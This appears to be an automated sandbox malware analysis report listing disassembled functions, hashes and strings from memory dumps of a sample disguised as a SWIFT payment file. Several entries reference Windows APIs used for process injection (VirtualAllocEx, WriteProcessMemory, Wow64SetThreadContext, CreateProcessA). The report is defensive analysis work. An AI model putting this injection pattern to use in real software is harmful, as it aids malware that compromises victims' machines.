Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: (p$d
API String ID: 0-1637876577
Opcode ID: f0183798a7c757803a235317b02d7b5043de926d2ed1891d130956d32f9cfc76
Instruction ID: 6204a10819dd51c7945ffa1e2702341328e350dca484d132400f8474a8f6b6d5
Opcode Fuzzy Hash: f0183798a7c757803a235317b02d7b5043de926d2ed1891d130956d32f9cfc76
Instruction Fuzzy Hash: A2D16E307406068FCB54CF29C484AAABBF6FF89314B29C959E55A8B765DB30FC45CB90

Function 05FD35A0 Relevance: 2.8, Strings: 2, Instructions: 279
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'p, xrefs: 05FD391F
4'p, xrefs: 05FD392F

Memory Dump Source

Source File: 00000000.00000002.2340924209.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fd0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: 4'p$4'p
API String ID: 0-3973980265
Opcode ID: 9164e5862cc5d714eeeb76306cf1c36aabbf8f766ce9dca6b757bf9a6cd2ffc1
Instruction ID: 1dd0f575059c92074f141ee70e1cf747a3d853c15b25028a55ca3448af5602c3
Opcode Fuzzy Hash: 9164e5862cc5d714eeeb76306cf1c36aabbf8f766ce9dca6b757bf9a6cd2ffc1
Instruction Fuzzy Hash: A3C1C275D04219CFDB98DFA4C444AAEFBB3BF49301F148829D6126B394CB395982CF62

Function 060B6120 Relevance: 2.7, Strings: 2, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hp, xrefs: 060B62C5
(p, xrefs: 060B6236

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: (p$Hp
API String ID: 0-3691929625
Opcode ID: 3b27792c4f5c65d6206da3ca2670eaa7cae02aa933c61802fd2e4582131ce382
Instruction ID: dde360aa911c07ac1096fca60fbbc43d21b1556e623f9ae5d9006b3debf62fd2
Opcode Fuzzy Hash: 3b27792c4f5c65d6206da3ca2670eaa7cae02aa933c61802fd2e4582131ce382
Instruction Fuzzy Hash: 2651D1307442418FC7A99F78C85466EBBF7EFC9601B2484ADD9428B3A1CE35DD46CB91

Function 060B86E0 Relevance: 2.7, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(p, xrefs: 060B87F4
(p, xrefs: 060B884B

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: (p$(p
API String ID: 0-216383650
Opcode ID: b48fc6284093fed3560ec50a300db7a5d52918ba8ab86f9b1a3e7bdce8c7fead
Instruction ID: 748029f632cfb6a1e58e85b75ba7466f37aa3d53f5df14cf98e2b6dce7c0a847
Opcode Fuzzy Hash: b48fc6284093fed3560ec50a300db7a5d52918ba8ab86f9b1a3e7bdce8c7fead
Instruction Fuzzy Hash: 0251E0317402018FCB659F69D854AAE7FE6EF88705F248069E806CB3A1CB38DD56CB91

Function 060BB8A0 Relevance: 2.6, Strings: 2, Instructions: 121COMMON

Download Yara Rule

Strings

pp, xrefs: 060BBA07
4'p, xrefs: 060BB934

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: 4'p$pp
API String ID: 0-276496374
Opcode ID: 5607f5d3e27be4d75e16e5d572159e8a2e81fe0592d56a200b3253c9a8646d06
Instruction ID: d1d645e2cbbb6b5652117b9ed30e40b955eee24c58b9d2423ac7488a60f23579
Opcode Fuzzy Hash: 5607f5d3e27be4d75e16e5d572159e8a2e81fe0592d56a200b3253c9a8646d06
Instruction Fuzzy Hash: 0E41AE70A443069FC755DB68C8407AEBBF6EFC8300F148929C546AB365DB75AA09CBA1

Function 060BD180 Relevance: 1.9, Strings: 1, Instructions: 677COMMON

Download Yara Rule

Strings

,p, xrefs: 060BD4FB

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: ,p
API String ID: 0-2091407873
Opcode ID: 5adc68c879aa710f0f6f7f45a96702da4b380002791df4a5a74325763a68fd2a
Instruction ID: 63572cb81a9508c2235ca6a422faeeb1e5efda0a932f4e001e02ac9a2e5975a4
Opcode Fuzzy Hash: 5adc68c879aa710f0f6f7f45a96702da4b380002791df4a5a74325763a68fd2a
Instruction Fuzzy Hash: 2A52FC75A402298FDB64DF68C991BEDBBF2BF88300F1581D9D509A7391DA309E81CF61

Function 060B76CF Relevance: 1.8, Strings: 1, Instructions: 541COMMON

Download Yara Rule

Strings

(_p, xrefs: 060B796D

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: (_p
API String ID: 0-2702063464
Opcode ID: c589ed84a66ca49cf78c8bf4aafa9cc38d8b14bc900988d18a94979330f53c8c
Instruction ID: 54c64b89c79461804d303ef223490a52dad54f15eeb67a0a809648a8d736c04e
Opcode Fuzzy Hash: c589ed84a66ca49cf78c8bf4aafa9cc38d8b14bc900988d18a94979330f53c8c
Instruction Fuzzy Hash: 16225A75B502059FDB94CF68D490AADBBF2EFC8310F148169E905AB3A1CB75ED81CB90

Function 06261D78 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06261FDF

Memory Dump Source

Source File: 00000000.00000002.2341981609.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: true

Associated: 00000000.00000002.2341848379.0000000006210000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6210000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 3a1727132a4e90d4a42f3183c3c5a55c9aba3803d42a64ccd6d025586c19b02b
Instruction ID: 341331c56772fef91dc6b38ecfa49eeb8253ebf70342db6cbacbbc100afdf010
Opcode Fuzzy Hash: 3a1727132a4e90d4a42f3183c3c5a55c9aba3803d42a64ccd6d025586c19b02b
Instruction Fuzzy Hash: C7A10170D10219CFDF60CFAAC885BEEBBF1BB09300F109569E859A7280DB749995CF45

Function 061A7684 Relevance: 1.7, APIs: 1, Instructions: 177fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(?,?,?), ref: 061A780B

Memory Dump Source

Source File: 00000000.00000002.2341620124.00000000061A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61a0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 268d6dc53f3213cbd392b6b42014d1bd829466124dae19c6ea0495a7d20f2170
Instruction ID: 04aa510d61d418873278c5f14d67e63ece30dff970c81b91d1514154340db8bf
Opcode Fuzzy Hash: 268d6dc53f3213cbd392b6b42014d1bd829466124dae19c6ea0495a7d20f2170
Instruction Fuzzy Hash: 03611278D003199FDB54DFA9C845BEEBBF1FB49310F249529E815A7280DB748A85CF81

Function 061A7690 Relevance: 1.7, APIs: 1, Instructions: 169fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(?,?,?), ref: 061A780B

Memory Dump Source

Source File: 00000000.00000002.2341620124.00000000061A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61a0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 22ef61c534d65dbf9a40cff0bacf6c865ab0fd6e65f0351b1b2e6b1b02d67ce9
Instruction ID: fdc8bd2b81e49ba116cf9aa168ebd4b9360fd6149117d89416e51c0815ba525d
Opcode Fuzzy Hash: 22ef61c534d65dbf9a40cff0bacf6c865ab0fd6e65f0351b1b2e6b1b02d67ce9
Instruction Fuzzy Hash: EB612378D003199FDB54DFA9C885BEDBBF1FB48310F249529E815A7280DB748A81CF81

Function 06262FD0 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 062630A3

Memory Dump Source

Source File: 00000000.00000002.2341981609.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: true

Associated: 00000000.00000002.2341848379.0000000006210000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6210000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 26213a468d5294485457795dfc2c2dd99d29853c7c26eb6a0f3b91672e85c881
Instruction ID: 80e615f70b531e7bf3b2e92b4f6bf969c947b3b7cf31eb92c9473fe9619a6a78
Opcode Fuzzy Hash: 26213a468d5294485457795dfc2c2dd99d29853c7c26eb6a0f3b91672e85c881
Instruction Fuzzy Hash: 2241AAB4D002589FCF10CFA9D984AEEFBF1BB49310F14942AE815B7240D739AA45CF64

Function 06262CD0 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06262D7A

Memory Dump Source

Source File: 00000000.00000002.2341981609.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: true

Associated: 00000000.00000002.2341848379.0000000006210000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6210000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 32fd902e960bad13a45197a975e513b1eb3a1dbf688ee9f1cfb12e33c09fe9db
Instruction ID: 7d130c50e568a998bff2ce8d97f1319c65470f6ab7da1030958932646571ad70
Opcode Fuzzy Hash: 32fd902e960bad13a45197a975e513b1eb3a1dbf688ee9f1cfb12e33c09fe9db
Instruction Fuzzy Hash: FB3176B8D04258DFCF10CFA9D980AAEFBB5AF49310F10A42AE815B7250D735A946CF64

Function 0151FBB8 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 0151FC5C

Memory Dump Source

Source File: 00000000.00000002.2320332430.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1510000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 95ec6f57e0bb2a541c936177fe191910385e2dca4cfd71f08355e9806f8a6ebc
Instruction ID: e9bfc510c9aa9a62f6dcdf86c618c09a880382da84ddf50aca83a226c0c00531
Opcode Fuzzy Hash: 95ec6f57e0bb2a541c936177fe191910385e2dca4cfd71f08355e9806f8a6ebc
Instruction Fuzzy Hash: AD31A7B4D042489FDF10CFA9D984AAEFBF0BF49310F14942AE815B7214D735A9458FA4

Function 06262628 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 062626D7

Memory Dump Source

Source File: 00000000.00000002.2341981609.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: true

Associated: 00000000.00000002.2341848379.0000000006210000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6210000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 33dd135a4594de897e53963a3028db54346e54d639b9f9923aa6bafda47777e2
Instruction ID: 27c73955bb7660f3e9f3db8bba31cdc2e52c1986d84831737952a491813ea45a
Opcode Fuzzy Hash: 33dd135a4594de897e53963a3028db54346e54d639b9f9923aa6bafda47777e2
Instruction Fuzzy Hash: 5331ACB4D11259DFDB10CFAAD884AEEBBF1AB49310F14842AE815B7240C778A985CF54

Function 0634CCE2 Relevance: 1.6, APIs: 1, Instructions: 86COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32(?,?), ref: 0634CD7A

Memory Dump Source

Source File: 00000000.00000002.2342191199.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6340000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: e005b5dde20274c7c7c802b3044ee2d370370e6bc6540cd5de1f1557a36b35c0
Instruction ID: 2dee7950681ebe8c6cd37467a137f066f434f84b2f604bd09ad60d01a305035e
Opcode Fuzzy Hash: e005b5dde20274c7c7c802b3044ee2d370370e6bc6540cd5de1f1557a36b35c0
Instruction Fuzzy Hash: 0A31CBB5D012589FCB10CFA9D980AEEFBF5EF49310F14942AE854B7240D739A946CFA4

Function 0634CCE8 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32(?,?), ref: 0634CD7A

Memory Dump Source

Source File: 00000000.00000002.2342191199.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6340000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 887b4e4105bfe5d54598b487925be8a3b729afc5cca53387bf62c82c1eadd3d9
Instruction ID: 26374a49eac0d992dfaed7d5ba1de8095553d39d9a5701a14b5a37ae92032310
Opcode Fuzzy Hash: 887b4e4105bfe5d54598b487925be8a3b729afc5cca53387bf62c82c1eadd3d9
Instruction Fuzzy Hash: 7731BBB5D012589FCB10CFA9D980AEEFBF5BF49310F14942AE815B7240C739A945CFA4

Function 060B7E50 Relevance: 1.5, Strings: 1, Instructions: 244COMMON

Download Yara Rule

Strings

Plp, xrefs: 060B8038

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: Plp
API String ID: 0-2701032082
Opcode ID: 95019992119c13976c34fa577a521d9f14cdb48b1139091a988d6a636d30740d
Instruction ID: 55b20334329cba910c126cc206aa7ba3a5e35736bb8040dbd03e96f7ff7dc918
Opcode Fuzzy Hash: 95019992119c13976c34fa577a521d9f14cdb48b1139091a988d6a636d30740d
Instruction Fuzzy Hash: 66912430B502058FCB98DF28C884AAE7BF6AF89350F1580A9E505DB3B5DB71DC41CB91

Function 060BC298 Relevance: 1.5, Strings: 1, Instructions: 228COMMON

Download Yara Rule

Strings

4'p, xrefs: 060BC4C2

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: 4'p
API String ID: 0-481844870
Opcode ID: 1014129f21b5df927d0ee5a14081b1669df630a79d92c2e9c0c3ab323d5eec3e
Instruction ID: 88fd3cc18677658ec790a7775dca71236c3d34c9e47da782440fdee6af933529
Opcode Fuzzy Hash: 1014129f21b5df927d0ee5a14081b1669df630a79d92c2e9c0c3ab323d5eec3e
Instruction Fuzzy Hash: 41A11A34A50218CFDB58DFA4D898ADDBBB2FF88300F558559E505AB365DB30EC46CB90

Function 060B3268 Relevance: 1.5, Strings: 1, Instructions: 220COMMON

Download Yara Rule

Strings

|, xrefs: 060B3518

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: e8a1e75b5a01cd535ccdc8d992605a7732ba78d8926289f6cb8da73575c571d2
Instruction ID: 8210717728479ace8017f92352b8c285628ae3f2de2c3b7350e03ad0fe9f9646
Opcode Fuzzy Hash: e8a1e75b5a01cd535ccdc8d992605a7732ba78d8926289f6cb8da73575c571d2
Instruction Fuzzy Hash: 85817C35B812158FCB59CFA5D554AEDBBF2EF88311F248069E511A7390CB3ADD41CB50

Function 060B2EF0 Relevance: 1.4, Strings: 1, Instructions: 162COMMON

Download Yara Rule

Strings

(p, xrefs: 060B2F64

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: (p
API String ID: 0-4175582459
Opcode ID: 97263da6424b2820413228813e551f7cf58685aee566b791ae663f5445b399b6
Instruction ID: 44adb779c67ca153749a651d81c0c4f48bcdc3bb1c9f5970eb91c65cbf32eb85
Opcode Fuzzy Hash: 97263da6424b2820413228813e551f7cf58685aee566b791ae663f5445b399b6
Instruction Fuzzy Hash: 9C51F731A406068FCB15DF68C494AAAFFB1FF85320B25C5A6D9159B341C730F951CBD1

Function 060B1F30 Relevance: 1.4, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

pp, xrefs: 060B1FE0

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: pp
API String ID: 0-2116140168
Opcode ID: 5a568ead04b4dc5a9d857c9c411d0efafdb1c724a99a1f8ced1baecde2c7b5a0
Instruction ID: 9e2c0bcb12b7192c391fc8e2f080001300cdb6bb095271ac8e476f16c2ae1187
Opcode Fuzzy Hash: 5a568ead04b4dc5a9d857c9c411d0efafdb1c724a99a1f8ced1baecde2c7b5a0
Instruction Fuzzy Hash: B6514D76600100AFCB459FA8C914D69BFF2FF8D32071980D9E6499B372DA36DC21EB51

Function 060B3DD0 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

,p, xrefs: 060B3E33

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: ,p
API String ID: 0-2091407873
Opcode ID: 17f7af72fd8db3127dcbf1b0b1e3140320b58332a4d8c7f6703f6c2ec6972b19
Instruction ID: 16e11f22cfacab01884e9386a786bbd137e7aed7479bed035fa978de49a70511
Opcode Fuzzy Hash: 17f7af72fd8db3127dcbf1b0b1e3140320b58332a4d8c7f6703f6c2ec6972b19
Instruction Fuzzy Hash: 46415B35B402058FCB15DF68D850AAEBBF2EF89311F25806AE9059F3A5DB31ED41CB91

Function 060BF940 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

4'p, xrefs: 060BF9F7

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: 4'p
API String ID: 0-481844870
Opcode ID: dad4b4db024c9cd5db003264cb32b797e8849a792437a0a8dc545f2187266876
Instruction ID: a318fa07ff73d7eba4d9bb1458a142a5adc4503c39f1bf54b6a1d8d0e9e6f92c
Opcode Fuzzy Hash: dad4b4db024c9cd5db003264cb32b797e8849a792437a0a8dc545f2187266876
Instruction Fuzzy Hash: 17418F717806119FD348DB68C859F6A7BE6AFCC710F108568E2068B3A5DE75EC42C790

Function 060BF950 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

4'p, xrefs: 060BF9F7

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: 4'p
API String ID: 0-481844870
Opcode ID: 3c705adcfb07c0150ac15498b388775a06d85c094fa2b2d0cf3f4d00d9168882
Instruction ID: cc48e36dcf523d1f028d69fb17085948bff21cc252beab37bea8cb8601adc169
Opcode Fuzzy Hash: 3c705adcfb07c0150ac15498b388775a06d85c094fa2b2d0cf3f4d00d9168882
Instruction Fuzzy Hash: 0D316D717806119FD348DB68C855F6A7BE6EFCC710F108568E60A8B3A5DE75EC42CB90

Function 060BB31B Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

4'p, xrefs: 060BB361

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: 4'p
API String ID: 0-481844870
Opcode ID: 64da06c4145e9bd76f746047bb668057a0e828e189d8de5509d53e2fbc9902d5
Instruction ID: 6c231fc718387a9644c7377d48c99c01f61d7fd56f6c28777d920cc544f7eb98
Opcode Fuzzy Hash: 64da06c4145e9bd76f746047bb668057a0e828e189d8de5509d53e2fbc9902d5
Instruction Fuzzy Hash: B231C331B801159FCB588FA4C858D9ABFB3FF8C310B1540A9EA069B361CB31DC42CB90

Function 05FB0E00 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 05FB0E9F

Memory Dump Source

Source File: 00000000.00000002.2340881992.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: true

Associated: 00000000.00000002.2340446288.0000000005E70000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e70000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 94c391e30fc8c88443f0387ffeae712df23debb6ddda62af75b2ec5c1c8ad919
Instruction ID: 7d242ab309c66e5ec9afa5fcdee80f743f234781c41b366f6a311f15481e1a6a
Opcode Fuzzy Hash: 94c391e30fc8c88443f0387ffeae712df23debb6ddda62af75b2ec5c1c8ad919
Instruction Fuzzy Hash: 8A31A7B8D042489FCF10CFA9D884AEEFBB5AF49310F14942AE815B7210CB79A945CF94

Function 060B6A30 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

p<p, xrefs: 060B6A7A

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: p<p
API String ID: 0-2671882351
Opcode ID: 82c896cc31be8b7ee5c5681eabb5a2ed33cf29044b0f7ccfe2e423d79ab315d1
Instruction ID: 4976ba10fc26a5681b1308c7e3c841c99544b78edf42414fabdd8c76cc35ecca
Opcode Fuzzy Hash: 82c896cc31be8b7ee5c5681eabb5a2ed33cf29044b0f7ccfe2e423d79ab315d1
Instruction Fuzzy Hash: 68218D713542949FDB568F29C850AAA7FF5AF8A210B198096FD90CB261CA36DC41CF20

Function 05FD1E8C Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

4'p, xrefs: 05FD2659

Memory Dump Source

Source File: 00000000.00000002.2340924209.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fd0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: 4'p
API String ID: 0-481844870
Opcode ID: f44f0407916d6a17ad1def3385e600e2a88e938350f580a553c726730d8d9f90
Instruction ID: c7882966af19e813d5e5d77b0327b9b503926e87e3ac84c7980602befa23ff49
Opcode Fuzzy Hash: f44f0407916d6a17ad1def3385e600e2a88e938350f580a553c726730d8d9f90
Instruction Fuzzy Hash: F0316775D04209CFDB19CFA9D404ABEFBB2FF85311F1480AAD111A7250D7391A86CFA1

Function 060B3DC3 Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

,p, xrefs: 060B3E33

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: ,p
API String ID: 0-2091407873
Opcode ID: 82d9e3c91b77c569b77fb082078c49e7f93850f9a6d5069db71957f20eb12e6d
Instruction ID: 3cdad324d88582b7d4603dad1d1cb541922e73e7767ea8a8bd9b0c3fc184b99f
Opcode Fuzzy Hash: 82d9e3c91b77c569b77fb082078c49e7f93850f9a6d5069db71957f20eb12e6d
Instruction Fuzzy Hash: 06117F317442068FCB05DF69C850AAEBFF6AF85300F2580A6E901DB3A5D770ED41CB91

Function 064A5984 Relevance: 1.3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

q, xrefs: 064A5A29

Memory Dump Source

Source File: 00000000.00000002.2342275454.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: q
API String ID: 0-4110462503
Opcode ID: f6df5b840be6de110edf847afcda96a83388ad4cb5b1f03ed1f6ba99c745e736
Instruction ID: d4d87d0a35e1f794b57f180db695ee44c4bb98187e0f9cc3dfdfa24d12453998
Opcode Fuzzy Hash: f6df5b840be6de110edf847afcda96a83388ad4cb5b1f03ed1f6ba99c745e736
Instruction Fuzzy Hash: 9311B3B4A18219CFDB7ADF24C9447ADBBB9EB49304F0045EAE10DA3250DB795F859F00

Function 060B17F0 Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

N, xrefs: 060B17F0

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: N
API String ID: 0-1130791706
Opcode ID: 005a7d98c4deabe74c7da165c9cd47e756a9af68531b54e96cd4e200e608971a
Instruction ID: 9d37f10a494185c4c11850de11c35e3252b5927b3f00fb4b4c4221a43346cd5c
Opcode Fuzzy Hash: 005a7d98c4deabe74c7da165c9cd47e756a9af68531b54e96cd4e200e608971a
